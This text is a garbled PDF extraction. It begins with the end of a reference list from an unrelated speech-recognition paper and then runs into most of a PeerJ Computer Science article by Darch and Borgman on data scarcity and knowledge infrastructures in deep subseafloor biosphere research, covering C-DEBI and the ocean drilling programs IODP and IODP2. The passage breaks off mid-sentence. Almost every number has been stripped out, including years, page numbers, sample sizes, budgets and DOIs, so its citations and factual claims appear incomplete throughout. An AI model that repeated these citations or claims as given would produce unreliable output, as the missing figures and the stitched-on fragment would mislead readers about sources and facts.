phonetic units and word pronunciations for asr. in proceedings of the conference on empirical methods on natural language processing (emnlp), pages – . chia-ying lee. . discovering linguistic structures in speech: models and applications. ph.d. thesis, massachusetts institute of technology. percy liang, slav petrov, michael i. jordan, and dan klein. . the infinite pcfg using hierarchical dirichlet processes. in processing of emnlp, pages – . fergus r. mcinnes and sharon goldwater. . un- supervised extraction of recurring words from infant- directed speech. in proceedings of cogsci, pages – . daichi mochihashi, takeshi yamada, and naonori ueda. . bayesian unsupervised word segmentation with nested pitman-yor language modeling. in proceed- ings of acl, pages – . graham neubig, masato mimura, and tatsuya kawa- hara. . bayesian learning of a language model from continuous speech. the ieice transactions on information and systems, ( ): – . timothy j. o’donnell. . productivity and reuse in language: a theory of linguistic computation and storage. the mit press, cambridge, massachusetts and london, england. d. c. olivier. . stochastic grammars and language acquisition mechanisms. ph.d. thesis, harvard uni- versity. alex s. park and james r. glass. . unsupervised pattern discovery in speech. ieee transactions on acoustics, speech, and signal processing, ( ): – . jim pitman and marc yor. . the two-parameter poisson-dirichlet distribution derived from a stable subordinator. the annals of probability, pages – . jim pitman. . the two-parameter generalization of ewens’ random partition structure. technical re- port, department of statistics university of california berkeley. jennifer r. saffran, richard n. aslin, and elissa l. new- port. a. statistical learning by -month-old in- fants. science, ( ): – , december. jennifer r. saffran, elissa l. newport, and richard n. aslin. b. word segmentation: the role of dis- tributional cues. journal of memory and language, : – . odette scharenborg, vincent wan, and mirjam ernestus. . unsupervised speech segmentation: an analy- sis of the hypothesized phone boundaries. journal of the acoustical society of america, : – . yaodong zhang and james glass. . unsuper- vised spoken keyword spotting via segmental dtw on gaussian posteriorgrams. in proceedings of asru, pages – . yaodong zhang, ruslan salakhutdinov, hung-an chang, and james glass. . resource configurable spoken query detection using deep boltzmann machines. in proceedings of icassp, pages – . yaodong zhang. . unsupervised speech processing with applications to query-by-example spoken term de- tection. ph.d. thesis, massachusetts institute of tech- nology. submitted march accepted october published november corresponding author peter t. darch, ptdarch@illinois.edu academic editor sally jo cunningham additional information and declarations can be found on page doi . /peerj-cs. copyright darch and borgman distributed under creative commons cc-by . open access ship space to database: emerging infrastructures for studies of the deep subseafloor biosphere peter t. darch and christine l. borgman school of information sciences, university of illinois at urbana-champaign, urbana-champaign, il, united states information studies, university of california, los angeles, ca, united states abstract background. an increasing array of scientific fields face a ‘‘data deluge.’’ however, in many fields data are scarce, with implications for their epistemic status and ability to command funding. consequently, they often attempt to develop infrastructure for data production, management, curation, and circulation. a component of a knowledge infrastructure may serve one or more scientific domains. further, a single domain may rely upon multiple infrastructures simultaneously. studying how domains negotiate building and accessing scarce infrastructural resources that they share with other domains will shed light on how knowledge infrastructures shape science. methods. we conducted an eighteen-month, qualitative study of scientists studying the deep subseafloor biosphere, focusing on the center for dark energy biosphere investigations (c-debi) and the integrated ocean drilling program (iodp) and its successor, the international ocean discovery program (iodp ). our methods com- prised ethnographic observation, including eight months embedded in a laboratory, interviews (n= ), and document analysis. results. deep subseafloor biosphere research is an emergent domain. we identified two reasons for the domain’s concern with data scarcity: limited ability to pursue their research objectives, and the epistemic status of their research. domain researchers adopted complementary strategies to acquire more data. one was to establish c-debi as an infrastructure solely for their domain. the second was to use c-debi as a means to gain greater access to, and reconfigure, iodp/iodp to their advantage. iodp/iodp functions as infrastructure for multiple scientific domains, which creates competition for resources. c-debi is building its own data management infrastructure, both to acquire more data from iodp and to make better use of data, once acquired. discussion. two themes emerge. one is data scarcity, which can be understood only in relation to a domain’s objectives. to justify support for public funding, domains must demonstrate their utility to questions of societal concern or existential questions about humanity. the deep subseafloor biosphere domain aspires to address these questions in a more statistically intensive manner than is afforded by the data to which it currently has access. the second theme is the politics of knowledge infrastructures. a single scientific domain may build infrastructure for itself and negotiate access to multi-domain infrastructure simultaneously. c-debi infrastructure was designed both as a response to scarce iodp/iodp resources, and to configure the data allocation processes of iodp/iodp in their favor. how to cite this article darch and borgman ( ), ship space to database: emerging infrastructures for studies of the deep subseafloor biosphere. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:ptdarch@illinois.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. subjects human-computer interaction, digital libraries keywords knowledge infrastructures, scientific data, microbiology, long tail, big science, little science, big data, little data, cyberinfrastructure, data infrastructure introduction the array of scientific fields facing a ‘‘data deluge’’ has grown rapidly in the years since the term was coined (hey & trefethen, , p. ). new instruments are capable of collecting data at greater volume, variety, and velocity than ever before. consequences of these developments include the emergence of new infrastructures, changes in epistemologies, and new forms of collaborative work (kitchin, ; leonelli, ). however, in many fields data are scarce and hard won (borgman, ; kitchin & lauriault, ); their problem is the opposite of ‘‘big data.’’ domains suffering data scarcity may have lower epistemic status than those enjoying ‘‘data wealth’’ (sawyer, , p. ). consequently, they may attempt to increase their resources by developing better infrastructure to produce, manage, curate, and circulate the data they do have. we examine how a community of researchers studying the deep subseafloor biosphere experiences data scarcity, and how they develop knowledge infrastructures to address this scarcity. this scientific domain experiences acute data scarcity because it aspires to address questions of societal concern and existential questions about humanity in a more statistically intensive manner than is presently possible. two infrastructures have been critical to this community’s development (darch & sands, ). one was established long before the emergence of the deep subseafloor biosphere as a topic of scientific study and is shared with other domains. this is the integrated ocean drilling program (iodp, – ) and its successor, the international ocean discovery program (iodp , from ), an international organization that conducts scientific ocean drilling cruises on behalf of scientists studying physical and biological phenomena related to the seafloor (international ocean discovery program, ). the second infrastructure is specific to the deep subseafloor biosphere, namely the center for dark energy biosphere investigations, or c-debi (edwards, ). we explore the relationships between iodp/iodp infrastructure and c-debi infrastructure. multiple domains compete for the scarce infrastructural resources of iodp/iodp , such as space on drilling cruises for people and equipment, cores that are acquired on those cruises, and the work of data analysts and curators employed by iodp/iodp . the features of c-debi, including its structure, modes of providing financial support for researchers, and its data infrastructure, are designed to enable deep subseafloor biosphere researchers to do the following: . exploit existing iodp/iodp resources allocated to deep subseafloor biosphere research; and . make more effective interventions in the inter-domain politics of iodp/iodp infrastructure, thereby securing a greater share of iodp/iodp resources for their community. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. many scientific fields rely on both single- and multi-domain infrastructure, thus our findings apply to infrastructure far beyond the subseafloor biosphere domain. background and research questions in this section we introduce our research questions with a review of relevant literature. first we frame the concept of knowledge infrastructures, exploring how they develop, support, and constrain scientific practice. we consider the interaction between infrastructure specific to a single domain and infrastructure shared between domains. second, we discuss how and why the availability of data is a critical concern in science, with attention to how domains address data scarcity. third, we present more background on deep subseafloor biosphere research to explain why this scientific domain is an ideal site to study the interaction of knowledge infrastructures. knowledge infrastructures the term infrastructure is often used in reference to large-scale systems with multiple social and technical components that provide services, resources, and facilities (edwards et al., ). infrastructures, in the senses used herein, are ‘‘best understood as ecologies or complex adaptive systems’’ (borgman, , p. ). infrastructures are complex in the sense that they comprise multiple systems that may have been devised, built, and configured by different actors with varying objectives, but which function together. they are continuously adaptive in the sense that components change or are introduced (edwards et al., ). a particular type of infrastructure is ‘‘knowledge infrastructures,’’ which edwards ( , p. ) defined as ‘‘robust networks of people, artifacts, and institutions that generate, share, and maintain specific knowledge about the human and natural worlds.’’ infrastructure is a ‘‘fundamentally relational concept’’ in the sense that a sociotechnical configuration ‘‘becomes infrastructure in relation to organized practices’’ (star & ruhleder, , p. ). from the point of view of a particular domain, what is considered to be a knowledge infrastructure is precisely those configurations of social and technical components that provide resources to support a community’s shared objectives and practices. indeed, as a domain’s interests and practices change, the knowledge infrastructure must adapt if the domain is to remain relevant (ribes & polk, ). single vs. multi-domain infrastructures in some instances, a component of a knowledge infrastructure may serve one scientific domain alone. in other cases, a component serving one scientific domain may also serve as part of a knowledge infrastructure for others. over time, these relationships tend to shift, re- quiring both infrastructures and domains to adapt, sometimes willingly, sometimes less so. the large synoptic survey telescope (lsst), a telescope under construction with a projected budget of $ . billion, is an important example of a multi-domain infrastructure. lsst promises to provide data unprecedented in scale and scope for multiple domains within astronomy (lsst science collaboration et al., ). the process of building lsst requires negotiation between domains on decisions such as how to allocate scarce observing time during the planned ten years of data collection. this multiple-domain infrastructure, darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in turn, interacts with infrastructures serving single domains within astronomy. these include the dark energy survey, and the gaia telescope, which focuses on the milky way (dark energy survey, ; european space agency et al., ). these single-domain infrastructures were planned and began operations after significant funds were invested in lsst. the sociotechnical configurations of each project are shaped by lsst and vice versa (european space agency et al., ; lsst science collaboration et al., ). the authors of this paper also are involved in a case study of lsst (borgman et al., ). examples abound of interactions between single- and multiple-domain knowledge infrastructures. one example is between infrastructure that serves researchers studying earthquakes in southern california only (southern california earthquake center , ) and infrastructure that serves multiple domains related to the formation of volcanoes in the continent of north america (earthscope, ). a second example is between infrastructure intended to support a single domain studying coastal dynamics and multi- domain infrastructure that collects and distributes data about oceans, coastal regions, and the us great lakes (center for coastal margin observation & prediction, ; noaa, ). domains sharing infrastructure while infrastructures that serve individual domains have received the most study, other important infrastructures span multiple, and often competing domains. domain-spanning infrastructures often represent significant investment of public research funding and are critical sources of data for the research communities they serve. among the few shared infrastructures receiving scholarly attention is argos, whose study by benson ( ) revealed how marine biologists were able to negotiate a share of its infrastructural resources. argos is a satellite-based environmental surveillance system that provides data for oceanography, meteorology, and marine biology (ortega, ). marine biologists persuaded argos leaders to collect data elements important to them by appealing to the interests of their commercial partners. in return, the biologists compromised other elements of their data collection methods to satisfy argos partners in oceanography and meteorology. another perspective on negotiations in shared infrastructure is offered by ribes & finholt ( ), in their study of building infrastructure for studying the water environment. the forerunner to this infrastructure served a single community of researchers in environmental engineering, but the new infrastructure was intended to serve hydrological scientists as well. ribes and finholt show that the spokespeople of these domains negotiate infrastructure building more effectively when they represent a strong, clearly defined, and cohesive community. various mechanisms for defining, canvassing the opinions of, and representing a community—such as organizing forums and conducting surveys—play an important role in facilitating these spokespeople’s effectiveness. unfortunately, the effort to build this infrastructure fell apart before it began scientific operations (jackson & buyuktur, ). these studies suggest the importance of studying how domains negotiate processes of building and accessing infrastructural resources shared with other domains, and how the configurations of these infrastructures shape the work and organization of individual communities. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data scarcity and abundance as science became more professionalized in the early twentieth century, more emphasis was placed on mathematical methods. these methods, in turn, require data generation and statistical confirmation (bowler & morus, ). that shift in focus endowed science with greater cultural authority as the primary knowledge-generating institution within society (porter, ). the tight coupling of mathematization, data, and cultural authority helps to explain why domains that experience data scarcity are often so concerned with increasing their volume of data (sawyer, ). for example, in molecular biology, increasing quantification and statistical inference were driven by ‘‘an ever-present methodological anxiety manifested in the constant search for an increased objectivity –or in its converse: the avoidance of subjectivity’’ (italics in original). these methodological changes both require and accommodate increasing quantities of data (suárez-díaz, & anaya-munoz, , p. ). by increasing quantification and data-intensive practices, communities can increase their scientific credibility (hagen, ; kay, ). indeed, this increasing quantification frequently shapes, and is shaped by, hypothesis testing with laboratory-generated data (lenoir, ; paul, ). least studied are situations where ‘‘no data’’ exist, whether because no data were collected about a particular phenomenon, data may have existed but were not curated for longer term use, or data still exist but cannot be discovered or retrieved for a variety of reasons (borgman, ). increasing data production social mechanisms can encourage greater production of data and use of statistical methods. as domains develop norms that promote data-intensive research, those who eschew such approaches may be marginalized (keller, ). a domain’s quest for enhanced status may drive changes at the institutional level, even leading to the development of new domains. natural historians in the early th century, in the face of profound challenges to their domain’s status, made alliances with the more data-intensive and mathematically based discipline of population genetics, forming the new discipline of evolutionary biology (ceccarelli, ). domains sometimes address scarcity by producing large volumes of data. a notable example is cosmology, traditionally regarded as the poor relation to other domains of study in astronomy (such as lunar and solar astronomy) because they lacked sufficient data to support fundamental conjectures (kragh, ). cosmologists’ concern with this lowly status motivated the emergence of large telescope projects, known as sky surveys, that collect vast quantities of data about astronomical phenomena (sloan digital sky survey, ). cosmology is now characterized by the use of data-intensive statistical methods (strauss, ). similarly, molecular biology addressed data scarcity by developing the human genome project (lenoir & hays, ). gaining access to extant data one way for a domain to address its data scarcity is to negotiate access to extant infrastructures, which often occurs in parallel with adopting computational- and data- intensive epistemologies (chow-white & garcía-sancho, ). scientific databases are a darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. means to organize and classify information, providing ‘‘a contemporary key to both state and scientific power’’ (bowker, , p. ). infrastructure projects, in turn, may increase data production and circulation by shaping the behavior of scientists. interoperability strategies include imposing or embedding common standards, such as what counts as reliable evidence, acceptable research methods, and data management practices (bowker, ; leonelli & ankeny, ). infrastructure can also foster norms of behavior that encourage greater openness within a scientific community, including openness around data (leonelli, ). contributions to a database can, in turn, encourage greater willingness to contribute to a database, resulting in a self-reinforcing cycle of increased data availability and normative shifts towards greater data openness. databases can help encourage the circulation of types of data that the database does not support by creating expectations that scientists will share data when asked (leonelli & ankeny, ). kelty ( ) discusses how scientific newsletters in biology not only constituted an infrastructure to build communities around particular organisms, but also promoted sharing of research objects by requiring openness of researchers as a condition of receiving the newsletter (and thus continued membership of the community). lastly, and perhaps most importantly for knowledge infrastructures, is to address scarcity by building infrastructure that aggregates extant data or databases (meyer, ), or that integrates existing sites of data production into a single infrastructure (aronova, baker & oreskes, ). these databases play critical roles in supporting research and in fostering data-intensive methods (bowker, ; leonelli, ). one example is the long term ecological research network, whose infrastructure attempts to improve the management and accessibility of data produced by distributed ecological research stations. this network originated in the efforts of biologists to leverage ‘‘big science’’ funding opportunities by collecting and organizing large-scale datasets (aronova, baker & oreskes, ). however, a major barrier to data circulation and integration is the use of disparate standards by individual scientists, a problem particularly acute when scientists come from different disciplines or communities of practice (baker, jackson & wanetick, ; bietz & lee, ; borgman et al., ; borgman et al., ). scientists’ concerns about control of data, authorship rights, and incentives to undertake the work necessary to make their data shareable also limit the adoption of these infrastructures (borgman, ; borgman, wallis & enyedy ). research questions data scarcity is a critical problem for many scientific communities. much richer accounts are needed of how domains employ infrastructural approaches to data scarcity. one approach is to emphasize scarce resources when negotiating access to infrastructure. as discussed above, competition arises when an infrastructure attempts to accommodate all types and forms of data present in the participating communities, particularly in the face of conflicting data standards and formats. a second approach is to consider relationships between an infrastructure and others with which it overlaps. a single domain may rely upon multiple infrastructures simultaneously. a domain that builds an infrastructure to increase its flow of data may be expressing dissatisfaction with the existing infrastructure. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. new infrastructure is likely to address the shortcomings and exploit affordances of existing infrastructures. these considerations motivate our three research questions: ( ) how do scientific domains experience data scarcity? ( ) how does a scientific domain address data scarcity through developing knowledge infrastructures? ( ) what interactions occur between infrastructure specific to a domain and infrastructure shared with other domains? deep subseafloor biosphere research studies of the deep subseafloor biosphere draw together scientists from multiple physical and life science backgrounds who bring a wide variety of perspectives, tools, and methods (darch et al., ). researchers pursue their scientific goals by collecting and analyzing rocks from the seafloor, known as cores. their work involves data about the microbial communities in these cores and the core’s physical properties, such as geochemical or hydrological. scientific ocean drilling cruises are the primary source of cores for this community. from to , the integrated ocean drilling program (iodp) operated these cruises. scientific studies of the oceans receive extensive financial support from governments. as mukerji ( ) argues, this support depends on the ability of oceanographic research to address questions of major social and political concern. such concerns can include national defense, environmental issues, fisheries, and more recently, telecommunications. thus, in , us government support for scientific ocean drilling led to the international ocean discovery program (iodp ) as the replacement for iodp. iodp uses the same ships, drilling technologies, and other resources as iodp, and provides infrastructure for many scientific domains, including plate tectonics. the center for dark energy biosphere investigations (c-debi) is a science and technology center (stc) funded by the us national science foundation (nsf), and launched in september . c-debi was initially funded for five years, and successfully renewed for an additional five years ( – ). c-debi, which provides infrastructure for deep subseafloor biosphere researchers, has two main aims. one is to foster a community of researchers to study deep subseafloor microbial life, and the second is to promote scientific work on microbial ecology of the seafloor. this scientific work explores the role of subseafloor microbes in global environmental processes to improve knowledge of the origin, evolution, and extent of life on earth. these researchers are geographically distributed, with the principal investigator (pi) and four co-pis based at five universities across the us. c-debi funding covers projects conducted by over scientists in more than universities and research institutions across the usa, europe, and asia (center for dark energy biosphere investigations, ). c-debi was established before the nsf’s requirements for data management plans, which began with proposals submitted in (national science foundation, ). however, c-debi was required to develop a plan for its renewal application in (center for dark energy biosphere investigations, a). by this time, senior personnel in darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. c-debi had become more aware of the inter-domain politics in iodp/iodp , having participated in expeditions during and . in response to this awareness, and to requirements for a data management plan, the process of constructing infrastructure for scientific data management in c-debi began. thus, c-debi is itself a knowledge infrastructure for the domain of deep subseafloor biosphere research and c-debi has responsibility for developing further infrastructure components. our focus in this article is the relationships between the iodp/iodp infrastructure and the c-debi infrastructure, and the influence of data scarcity or abundance. our account pays attention to these relationships in the period up to c-debi’s renewal in summer , although work on infrastructure continues. we highlight the critical role of negotiations between scientific domains as they contest scarce infrastructural resources. single-domain infrastructures are both a response to, and an intervention in, these negotiations. our study advances research on interactions between representatives of different domains (such as in formal meetings, and informal encounters), and as domains build infrastructures for themselves. we also advance research on the motivations for domains to build infrastructure for themselves by examining how such infrastructure is configured to leverage and intervene in the control of shared infrastructure. analyzing this process, therefore, provides a valuable opportunity to understand the relationships between single- and multi-domain infrastructure, and is part of a larger study of knowledge infrastructures at multiple scientific sites (borgman et al., ). research methods we present findings from an eighteen-month, qualitative case study of scientists studying the deep subseafloor biosphere by focusing on c-debi and the ocean drilling programs on which it depends, the integrated ocean drilling program (iodp) and its successor, the international ocean discovery program (iodp ). this community affords rich opportunities for answering our research questions, enabling us to explore relationships between c-debi and iodp/iodp ; to ask how and why scientists engage in building, configuring, and negotiating these infrastructures to access data; and how the scarce resources of iodp/iodp are contested between multiple domains. our human subjects research was approved by the ucla north general institutional review board (# - -cr- ). data collection a key feature of this case study is long-term ethnographic observation of c-debi (hammersley & atkinson, ). we were embedded for eight months in a laboratory headed by a leading figure in c-debi at a large us research university, which involved one of the authors visiting the laboratory for two or three days per week to observe bench work and laboratory meetings. the first author also conducted weeklong observational work in two other participating laboratories in the us and joined researchers on a three-day field research expedition. we made extensive notes about what we observed, including the physical layout of the laboratories and laboratory benches, tools and methods used, and darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. patterns of collaboration. our informants told us about their backgrounds, aspirations, and experiences in the laboratories and on scientific cruises. these organizations are distributed across multiple institutions and countries, which posed issues of scalability for the researcher (star, ). the work of c-debi and iodp/iodp spans more sites than a small team of researchers can visit, much less meet face-to-face with all personnel. we focused on the techniques and technologies—the ‘‘scalar devices’’—employed by our research subjects to understand c-debi, iodp/iodp , and their domain (ribes, , p. ). one scalar device that we observed was gatherings such as the c-debi all-hands’ meeting and research workshops. a larger gathering was the american geophysical union fall meeting in san francisco, a major conference for the deep subseafloor biosphere community and iodp/iodp ; we also presented our early findings at this conference. these events enabled our research subjects to take stock of the scale of the communities and infrastructures in which they are embedded, in terms of the people involved, organizational hierarchies, and the range of scientific work conducted. another form of scalar devices is reports and workplans, which we studied as part of document analysis (see below). the distributed nature of c-debi and iodp/iodp also means that work in these organizations often takes place through communications media. by using multiple forms of media, we could establish ‘‘co-presence’’ when ‘‘co-location’’ was not possible (beaulieu, ). co-presence involves the researcher witnessing how the work of scientific collaborations is conducted even when they are not physically (or necessarily temporally) collocated with the subjects of research. lacking the opportunity to observe practices on board an iodp cruise, given the expense and limited places available, we studied iodp work conducted elsewhere. we attended online meetings and seminars where participation and data collection were planned, and watched a feature-length documentary that used footage from a deep subseafloor biosphere-focused cruise. other online observations included workshops, meetings where key c-debi personnel planned infrastructure to coordinate data management across the project, and websites of organizations and people. we assembled a corpus of documents for analysis. documents such as instruction manuals for laboratory equipment help to explain the work conducted by c-debi- affiliated scientists in their laboratories. other documents help us to interpret contexts in which c-debi scientists operate. these include official c-debi documents such as the funding proposal, annual reports to the nsf, and operating documents for c-debi and iodp/iodp . these documents function as scalar devices by giving details and metrics about activities, plans, and available infrastructural resources. our research also draws heavily on semi-structured interviews; the sample for this article consists of people, which includes c-debi-affiliated scientists, curators and managerial staff involved in iodp/iodp , as detailed in table . the column involved in iodp indicates which c-debi interviewees are involved in decision- or policy-making in iodp/iodp . these interviewees are further split into two groups: those in cruise operations, and those with the consortium for ocean leadership, responsible for administering us involvement in iodp (but not iodp ). interviews ranged in length darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the composition of our interview sample. career stage interviewees involved in iodp c-debi usa-based undergraduate graduate student postdoctoral researcher faculty management non-usa-based faculty total c-debi iodp cruise operations curator staff scientist technical support ocean leadership policy data management total iodp from min to two and one-half hours, with the majority being between one and two hours long. with the consent of the interviewees, interviews were recorded and sent to an external company for transcription. c-debi interviewees were initially recruited from those scientists being observed in the laboratory, and were typically interviewed after an extended period of observation. other c-debi interviewees were recruited from those who had been awarded c-debi-funded grants, with these interviews typically taking place over skype. we have interviewed undergraduate and graduate students, postdoctoral researchers, faculty members, and non-scientists with senior level roles in administering and operating c-debi. iodp interviewees were identified and approached through a range of methods, including personal introductions from c-debi-affiliated scientists and other iodp personnel, and from public websites. our interviews covered a range of topics, including interviewees’ backgrounds and career trajectories. we asked scientists and technical staff detailed questions about the scientific work they are undertaking and the importance and role of data in their work. we also asked iodp/iodp technical staff and c-debi scientists who have participated in iodp cruises about their work on board expeditions, how they negotiate for access to cruise resources, and how they transfer data, methods, techniques, and collaborative networks between cruises and their onshore laboratories. non-scientists were asked about their roles in building and administering c-debi and iodp/iodp infrastructure. where interview quotations are used in this paper, we add a code in parentheses after each quote indicating whether they are iodp or c-debi, their career stage, and a number unique to each interviewee: (iodp curator, # ) or (c-debi faculty, # ) etc. data analysis our initial data analysis involved close reading of our ethnographic notes, interview transcripts, and documents. based on these readings, we identified emerging themes about the relational, complex, and dynamic nature of knowledge infrastructures, and coded our darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data accordingly. in particular, we focused on themes relating to how those we interviewed described their own work (scientific, organizational, building infrastructure); how they identified and defined communities of which they considered themselves members; what resources, both current and anticipated, they identified as necessary to their own work and to deep subseafloor biosphere research as a whole; what they considered to be infrastructure; and how they and their community engaged with other scientific communities to negotiate, access, and build infrastructure. we refined our coding scheme iteratively, going back and forth between our scheme and the data. using a range of sources enables us to triangulate, cross-checking our data to validate our findings (o’donoghue & punch, ). we began our data analysis after completing approximately six months of laboratory observation and fifteen interviews. we have thus been able to strike a balance between ensuring that our observations have not been biased by preconceived ideas and being able to assess our emerging findings and tentative hypotheses against further observations. we presented our emerging findings to the deep subseafloor biosphere research community at major scientific meetings (see above) for feedback and clarification. results deep subseafloor biosphere research is a relatively new domain of study. significant momentum for its emergence came in the late s upon the publication of an article that extrapolated data about the size of microbiological communities in coastal sediments to the deep subseafloor (whitman, coleman & wiebe, ). that article concluded that deep subseafloor microbes might constitute up to one-third of all of earth’s biomass. this claim had major implications for important questions of scientific and human concern, such as the global nitrogen cycle. as a new domain of scientific study, and one for which little data existed prior to its emergence, the strategy of founding scientists rested on acquiring more data for research. this pursuit of more and better quality data continues to be a critical force to this day. results are grouped into three sections. first, we frame the data scarcity problem in the terms of the deep subseafloor biosphere research community. second, we discuss how this new research community established relationships with the international drilling programs, which is their major data source, and built some of their own complementary infrastructure. in this section, we also compare c-debi’s choices of infrastructure for data management to those of other nsf science and technology centers that were founded in the same time period. third, we explore how the c-debi and ocean drilling programs worked together, in ways more and less successful, to develop a robust research community for deep subseafloor biosphere research. data scarcity complaints by deep subseafloor biosphere scientists about the ‘‘dearth of data’’ for their core research questions led to the founding of c-debi (edwards, : ). relevant data still exist only for a few sites in the ocean and, compared to studies of microbial ecology in other environments, is about relatively basic phenomena. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. two reasons emerged for the community’s continuing concern with data scarcity. the first is constraints on scientists’ ability to pursue their field’s immediate research objectives, which are to characterize deep subseafloor microbial communities in terms of the quantity and types of microbes that exist, how these microbes interact with the physical environment they inhabit, and how microbial communities vary between geographic sites on the seafloor (orcutt et al., ). as a c-debi report stated, ‘‘evidence for microbial alteration [of the physical environment] exists, yet scientists lack robust molecular, biochemical, or physiological data so needed’’ (center for dark energy biosphere investigations, , p. ). the second concern about data scarcity relates to the status of deep subseafloor biosphere research relative to studies of microbial ecology in other environments, and thus for their ability to attract future resources and funding. in the words of many scientists that we stud- ied, research on the deep subseafloor biosphere is largely exploratory or discovery-driven, while research on microbial ecology in other environments is largely hypothesis-driven: ‘‘our work in the lab in general tends to be classified as rather exploratory as opposed to hypothesis-driven. this is something...that i met researchers who take issue with because they insist that to be a true science, proper science, you need to have a question and then you need to have a methodology that will either answer ‘yes’ or ‘no’, or some number. whereas, our kind of science is oftentimes, it’s more like, ‘i wonder if...’ and then you try something and the results are occasionally interesting, and then you go, ‘look what i found.’ you didn’t know what you were looking for, you just cast a big net out.’’ (c-debi graduate student, # ) as some c-debi scientists stated the problem, if the approach of deep subseafloor biosphere researchers has a lower scientific status than studies of microbial ecology in other environments, they will receive fewer or smaller grants because ‘‘funding agencies will rarely fund basic discovery science’’ (teske, biddle & schrenk, , p. ). as the deep subseafloor biosphere emerged as a domain of study, researchers adopted a strategy of building and leveraging infrastructure to acquire more data. one of their strategies was to build infrastructure specifically for deep subseafloor biosphere researchers, first by establishing c-debi. the second strategy was to use c-debi as a means to gain greater access to, and to reconfigure, iodp for their advantage. notably for our research questions, iodp/iodp is an infrastructure that deep subseafloor biosphere research shares with other scientific domains. iodp/iodp provides the requisite infrastructure for the c-debi community to access the geographic sites and to acquire the physical samples necessary to produce data about the deep subseafloor biosphere. c-debi was initially established as a way to consolidate the position of the deep subseafloor biosphere within iodp and to recruit new researchers into the domain. over time, c-debi also began to build its own infrastructure to respond to the limitations of iodp in providing data, and to reconfigure the iodp infrastructure so that a greater share of iodp resources will be allocated to deep subseafloor biosphere researchers, thus increasing their supply of data. darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ocean drilling meets deep subseafloor biosphere research interest in deep subseafloor microbial life that emerged in the late s coincided with institutional challenges facing scientific ocean drilling programs. the predecessors to iodp that ran from to focused almost exclusively on physical science research. these programs facilitated major scientific successes. best known is the evidence for the theory of plate tectonics and continental drift (committee on the review of the scientific accomplishments and assessment of the potential for future transformative discoveries with us-supported scientific ocean drilling, ). many scientists were concerned that funding for ocean drilling would cease with the anticipated end of the ocean drilling program, iodp’s immediate predecessor, in . expanding the drilling mission to include the deep subseafloor biosphere provided the momentum necessary to secure funding for iodp to launch in . one of our interviewees, a senior administrator within iodp, quoted admiral watkins, who then headed the joint oceanographic institutions, ‘‘i can remember ...him saying, ‘give me bugs and i can give you a new program’’ (iodp policy, # ). c-debi as a single-domain infrastructure to reconstruct the origins of c-debi as an infrastructure for the emergent community of deep subseafloor biosphere researchers, we drew heavily upon documentary sources to complement our interviews and ethnography. the round of proposals for the launch of iodp was a critical inflection point. deep subseafloor biosphere research was one of three major scientific foci for iodp (integrated ocean drilling program (iodp) planning sub committee (ipsc) scientific planning working group, ), which planned four to five expeditions per year. proposals were required to state the scientific objectives of the cruise and to identify the sites a cruise would visit. three separate teams of scientists independently, and successfully, submitted proposals (in , , and respectively) for expeditions focused primarily on the deep subseafloor biosphere (although an iodp/iodp cruise will typically have a focus on one particular scientific domain, it will nevertheless involve scientists from all domains of study represented within iodp/iodp ). rather than work independently, the successful teams joined forces to coordinate the three biosphere-focused iodp cruises, which were planned for and . to consolidate the position of deep subseafloor biosphere research within iodp, in they established the dark energy biosphere investigations research coordination network. this network had four specific goals (edwards & amend, , p. ): • ‘‘develop an interactive community of deep-biosphere researchers • facilitate coordination of science between deep-biosphere drilling projects • stimulate interaction and education among disparate disciplines • enable synthesis and integration of data and technology advances’’ this network brought together scientists in regular face-to-face meetings, with the proposal to the nsf for c-debi in arising from one such meeting. c-debi, as introduced above, is a science and technology center (stc) funded by the us national science foundation (nsf), initially for five years from – , and subsequently renewed for another five years from – . the proposal to establish c-debi set darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. out two major goals. one is ‘‘to coordinate, integrate, support, and extend the science’’ of deep subseafloor biosphere research, and the second to help ‘‘foster and educate an interdisciplinary community of deep subseafloor biosphere researchers, with a focus on students and junior researchers’’ (edwards, : ). the focus on students and junior researchers highlights the aspiration to establish an enduring community. the significance of this long-term view was highlighted, sadly, by the deaths of two of the five founding co-investigators during the first five years of c-debi. it is a tribute to their vision that the collaboration was sufficiently robust to reorganize with new investigators and to win the second five-year award. c-debi has developed social, technical, and policy means to pursue its aims, including funding support for scientists, a website and meetings to circulate knowledge and to bring together globally distributed researchers, and an infrastructure for data management that continues to evolve. in its early years, c-debi focused more on recruiting scientists to study the deep subseafloor biosphere than on building technical or policy infrastructure. recruiting occurs by distributing grants to support small-team (usually two or three persons) laboratory-based research projects (typically one to three years in length), or graduate and postdoctoral fellowships. these grants typically support projects in which scientists use cores collected from scientific ocean drilling cruises to produce new data in their onshore laboratories, and to support projects that develop new techniques to study the deep subseafloor biosphere. to date, nearly such grants have been distributed across more than institutions in the usa (center for dark energy biosphere investigations, ). however, in the early years of c-debi, these grants were not accompanied by a strategy for managing the data produced by the funded projects. c-debi data portal although the c-debi proposal aspired to build data management infrastructure, stating that ‘‘c-debi will develop and maintain a website for public access and data sharing among the c-debi 